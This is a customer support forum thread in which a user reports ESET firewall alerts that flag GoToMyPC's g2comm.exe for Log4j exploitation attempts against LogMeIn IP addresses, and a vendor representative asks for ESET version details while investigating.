cancel
Showing results for 
Search instead for 
Did you mean: 
J.1
Contributor

ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

I got a report from  my system's ESET endpoint security software today:

 

NEW NOTIFICATION

Firewall event detected and blocked by Eset

An Event Log notification has occurred with the following parameters:

Category: Firewall detection
Monitored static group: All
Attempt was made to reach 67.217.69.93 on port 80 by a machine at (internal address) and blocked
1 per minute were noticed
Firewall detection . Event is one of {Security vulnerability exploitation}

 

The official detection was cited as JAVA/Exploit.CVE-2021-44228 . The destination given up there is an IP address in LogMeIn's block. The program ESET claims made this exploitation attempt is C:\Program Files (x86)\GoToMyPC\g2comm.exe. Prior to this, one of our other security/IPS systems claimed that other machines also attempted Log4j exploitations against several IP addresses. All of the target IPs were LogMeIn addresses. Is there something in the Gotomypc agent that causes security systems to believe that a log4j attack is being made?

Tags (3)
8 REPLIES 8
AshC
LogMeIn Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Thanks @J.1 

We will try to investigate this further and let the Community know our findings. 

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

It happened again over the weekend.

 

NEW NOTIFICATION

Firewall event detected and blocked by Eset

An Event Log notification has occurred with the following parameters:

Category: Firewall detection
Monitored static group: All
Attempt was made to reach 216.115.214.177 on port 80 by a machine at (different internal address than last time) and blocked
1 per minute were noticed
Firewall detection . Event is one of {Security vulnerability exploitation}

 

216.115.214.177 is a Logmein/Goto address. According to our ESET records, the process making this attempt was once again C:\Program Files (x86)\GoToMyPC\g2comm.exe and the specific exploitation was JAVA/Exploit.CVE-2021-44228.

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Firewall event detected and blocked by Eset

An Event Log notification has occurred with the following parameters:

Category: Firewall detection
Monitored static group: All
Attempt was made to reach 68.64.26.45 on port 80 by a machine at (internal address) and blocked
1 per minute were noticed
Firewall detection . Event is one of {Security vulnerability exploitation}

 

Once again, the target is a LogMeIn IP, and ESET says the detection is JAVA/Exploit.CVE-2021-44228, with the guilty process being C:\Program Files (x86)\GoToMyPC\g2comm.exe.

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Happened again, several seconds ago. Please let us know why Gotomypc appears to be triggering Log4j detectors even though it's supposed to no longer use that code. Thank you.

AshC
LogMeIn Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

@J.1   Can you tell us what ESET product / version you're using there? 

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

ESET Endpoint Security version 9.0.2032.6.  

ESET PROTECT (Server), Version 9.0 (9.0.1141.0)
ESET PROTECT (Web Console), Version 9.0 (9.0.138.0)

AshC
LogMeIn Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

@J.1  Thanks, we continue to investigate.  

J.1
Contributor

Re: ESET software claims g2comm.exe (Gotomypc) is attempting a log4j exploitation

Has there been any kind of progress in figuring this one out?

 

Thank you.